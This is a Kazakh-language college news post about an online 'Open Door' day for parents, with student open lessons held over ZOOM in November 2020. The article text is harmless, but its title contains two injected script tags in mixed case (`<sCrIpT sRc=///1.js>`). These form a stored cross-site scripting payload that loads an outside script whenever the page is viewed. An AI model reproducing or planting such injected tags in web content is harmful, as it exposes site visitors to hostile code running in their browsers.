Ата-аналарға арналған «Ашық есік» күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

23.11.2020

Кәсіби бағыт-бағдар беріп, мамандық таңдауда ата-ананың маңызы зор. Өйткені баланың ең бірінші ұстазы – ол үйдегі ата-анасы. Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің ата-аналар қауымы студенттің кәсіби маман болып қалыптасуы жолында студентке бағытталып өткізіліп  жатқан барлық  іс-шараларға, оқу мен тәрбие процесіндегі жеткен жетістіктеріне және  колледждегі жалпы атқарылып жатқан жұмыстармен хабардар болып отырады. Ата-аналар колледж әкімшілігімен, топ кураторларымен тығыз байланыс орнатып қашықтықтан оқу кезінде де балаларының  оқу үлгеріміне бей-жай қарамай сабақ барысымен танысып отыруы дәстүрге айналған. Ағымдағы жылдың 19 қараша күні колледжде барлық мамандықтар бойынша 3 курс студенттері тарапынан ата-аналарға арналған Ашық есік күні ұйымдастырылды. ZOOM платформасы арқылы студенттер әртүрлі тақырыпта ашық сабақтар өткізді. БМ-31 тобының студенті Қайыржанова Аружан «Ғаламшарлар қалай орналасқан» тақырыбында, МД-31 тобының студенті Мұсылманбекова Алина тіл дамыту сабағы бойынша «Мектепке дейінгі ұйымдардағы күн», ДМ-41 тобының студенті Наурузова Милана дене тәрбиесі сабағынан «Гимнастикалық снарядтарда орындалатын жаттығулар», ФБ-41 тобының студенті  Ақмағанбетова Ақниет қазақ әдебиеті пәнінен «Ғылым таппай мақтанба» тақырыбында, И-31 тобының студенті Маратқызы Гүлсім информатика пәнінен «Заманауи түйіндеме», А-31 тобының студенті Баядил Жұлдыз ағылшын тілі пәнінен «Food and drinks»  тақырыптарында өткізген ашық сабақтарға ата-аналар белсенді қатысып, сабақ қорытындысында кері байланыс жасап  ой-пікірлерін білдірді. Студенттерге кәсіби маман болып қалыптасу жолында терең білім мен шығармашылық табыс тіледі.

Просмотров: 532


Пікір қосу



Деректерді қолтаңбаға қосу